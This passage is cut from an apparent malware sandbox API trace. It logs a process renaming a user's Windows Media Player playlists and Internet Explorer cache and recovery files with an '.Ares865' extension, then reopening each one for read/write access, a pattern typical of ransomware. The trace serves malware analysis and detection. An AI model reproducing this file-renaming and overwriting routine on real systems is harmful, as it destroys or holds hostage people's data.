playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1279) returned 1 [0099.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.Ares865") returned 140 [0099.410] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1267) returned 1 [0099.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.Ares865") returned 143 [0099.415] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1284) returned 1 [0099.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.Ares865") returned 145 [0099.420] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0099.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.421] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=797) returned 1 [0099.426] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.Ares865") returned 140 [0099.426] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.428] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=785) returned 1 [0099.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.Ares865") returned 141 [0099.436] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwFlags=0x1) returned 1 [0099.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0099.441] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.Ares865") returned 140 [0099.441] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0099.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.442] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1020) returned 1 [0099.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.Ares865") returned 134 [0099.448] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.ares865"), dwFlags=0x1) returned 1 [0099.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1025) returned 1 [0099.455] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.Ares865") returned 122 [0099.455] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.ares865"), dwFlags=0x1) returned 1 [0099.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.456] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1063) returned 1 [0099.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.Ares865") returned 125 [0099.460] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.ares865"), dwFlags=0x1) returned 1 [0099.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=585) returned 1 [0099.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.Ares865") returned 122 [0099.467] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.ares865"), dwFlags=0x1) returned 1 [0099.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1079) returned 1 [0099.472] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer" [0099.472] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865") returned 92 [0099.473] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\brndlog.txt.ares865"), dwFlags=0x1) returned 1 [0099.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\brndlog.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.474] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12208) returned 1 [0099.479] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\frameiconcache.dat.Ares865") returned 99 [0099.479] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\frameiconcache.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\frameiconcache.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\frameiconcache.dat.ares865"), dwFlags=0x1) returned 1 [0099.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\frameiconcache.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\frameiconcache.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9204) returned 1 [0099.485] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.Ares865") returned 93 [0099.485] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\msimgsiz.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\msimgsiz.dat.ares865"), dwFlags=0x1) returned 1 [0099.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\msimgsiz.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0099.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery" [0099.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active" [0099.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865") returned 158 [0099.492] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwFlags=0x1) returned 1 [0099.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3584) returned 1 [0099.500] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.Ares865") returned 158 [0099.500] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.ares865"), dwFlags=0x1) returned 1 [0099.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.503] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0099.505] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865") returned 144 [0099.506] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwFlags=0x1) returned 1 [0099.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0099.512] wsprintfW (in: param_1=0x2ccd198, 